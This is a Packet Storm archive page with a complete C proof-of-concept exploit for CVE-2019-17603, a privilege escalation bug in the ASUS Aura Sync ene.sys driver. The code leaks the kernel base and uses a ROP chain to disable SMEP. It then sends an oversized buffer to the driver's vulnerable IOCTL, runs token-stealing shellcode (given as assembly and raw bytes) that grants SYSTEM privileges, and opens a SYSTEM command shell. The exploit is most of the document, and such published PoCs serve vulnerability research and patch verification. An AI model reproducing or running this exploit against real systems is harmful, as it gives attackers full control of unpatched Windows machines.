exploit the possibilities

ASUS Aura Sync 1.07.71 Privilege Escalation

ASUS Aura Sync 1.07.71 Privilege Escalation
Posted Jun 25, 2020
Authored by Connor McGarr, dhn | Site github.com

ASUS Aura Sync version 1.07.71 ene.sys privilege escalation kernel exploit.

tags | exploit, kernel
advisories | CVE-2019-17603
MD5 | dd506cd09fc47f7ec526c55db6959c62

ASUS Aura Sync 1.07.71 Privilege Escalation

Change Mirror Download
// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040

unsigned long long kernelBase()
{

// Defining EnumDeviceDrivers() parameters
LPVOID lpImageBase[1024];
DWORD lpcbNeeded;

// Calling EnumDeviceDrivers()
printf("[+] Calling EnumDeviceDrivers()...\n");

BOOL baseofDrivers = EnumDeviceDrivers(
lpImageBase,
sizeof(lpImageBase),
&lpcbNeeded
);

// Error handling
if (!baseofDrivers)
{
printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
exit(1);
}

// ntoskrnl.exe is the first module dumped in the array
// Typcasting LPVOID to unsigned long long
unsigned long long krnlBase = (unsigned long long)lpImageBase[0];

// Print update for kernel base
printf("[+] Found kernel leak!\n");
printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase);

return krnlBase;
}

void exploitWork(void)
{
/*
[BITS 64]
_start:
mov rax, [gs:0x188] ; Current thread (_KTHREAD)
mov rax, [rax + 0xb8] ; Current process (_EPROCESS)
mov rbx, rax ; Copy current process (_EPROCESS) to rbx
__loop:
mov rbx, [rbx + 0x2e8] ; ActiveProcessLinks
sub rbx, 0x2e8 ; Go back to current process (_EPROCESS)
mov rcx, [rbx + 0x2e0] ; UniqueProcessId (PID)
cmp rcx, 4 ; Compare PID to SYSTEM PID
jnz __loop ; Loop until SYSTEM PID is found
mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt
mov [rax + 0x358], rcx ; Copy SYSTEM token to current process
xor rax, rax ; STATUS_SUCCESS
add rsp, 0xa0 ; Restore execution
ret ; Done!
*/

char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80"
"\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0"
"\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48"
"\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04"
"\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80"
"\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0"
"\x48\x81\xC4\xA0\x00\x00\x00\xC3";

// Allocating shellcode in user mode
LPVOID shellcode = VirtualAlloc(
NULL,
sizeof(payload),
0x3000,
0x40
);

// Error handling
if (!shellcode)
{
printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError());
exit(1);
}

// Print statement for exploit
printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n");

// Print update for shellcode location
printf("[+] Shellcode allocated at: 0x%llx\n", shellcode);

// Moving memory into allocated space in user mode
RtlMoveMemory(
shellcode,
payload,
sizeof(payload)
);

// Running kernelBase() here to get base of kernel for ROP gadgets
unsigned long long baseAddress = kernelBase();

// Defining buffer and buffer size to send to the driver
char buf [88];
size_t gadgetSize = 0x8;

// ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
// Run rp++ on the target before execution to adjust offsets accordingnly
// rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe

// Defining ROP gadgets
unsigned long long ROP1 = baseAddress + 0x4666b; // pop rcx ; ret: ntoskrnl.exe
unsigned long long ROP2 = 0x70678; // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
unsigned long long ROP3 = baseAddress + 0x1d87d7; // mov cr4, rcx ; ret: ntoskrnl.exe

// Using memset to copy memory into array
memset(buf, 0x41, 88);

// Print update for ROP chain
printf("[+] Exedcuting ROP chain to disable SMEP...\n");
memcpy(&buf[56], &ROP1, gadgetSize);
memcpy(&buf[56+8], &ROP2, gadgetSize);
memcpy(&buf[56+16], &ROP3, gadgetSize);
memcpy(&buf[56+24], &shellcode, 0x8);

// Obtaining handle to the driver
printf("[+] Obtaining handle to the driver via CreateFileA()...\n");
HANDLE drvHandle = CreateFileA(
"\\\\.\\EneIo",
0xC0000000,
0x0,
NULL,
0x3,
0x0,
NULL
);

// Error handling
if (!drvHandle)
{
printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError());
exit(1);
}

// Print update for HANDLE
printf("[+] Handle to the driver: %d\n", drvHandle);

// Sending buffer to the driver

// Defining lpBytesReturned parameter
DWORD lpBytesReturned;

// Invoking IOCTL routine
BOOL sendIoctl = DeviceIoControl(
drvHandle,
IOCTL_CODE,
buf,
sizeof(buf),
NULL,
0,
&lpBytesReturned,
NULL
);

// Error handling
if (!sendIoctl)
{
printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError());
exit(1);
}

printf("[+] Interacting with the driver...\n");
}

int main(int argc, char *argv[])
{
exploitWork();

// Print update for NT AUTHORITY\SYSTEM shell
printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

// Spawning an NT AUTHORITY\SYSTEM shell
system("cmd.exe /c cmd.exe /K cd C:\\");

return 0;
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close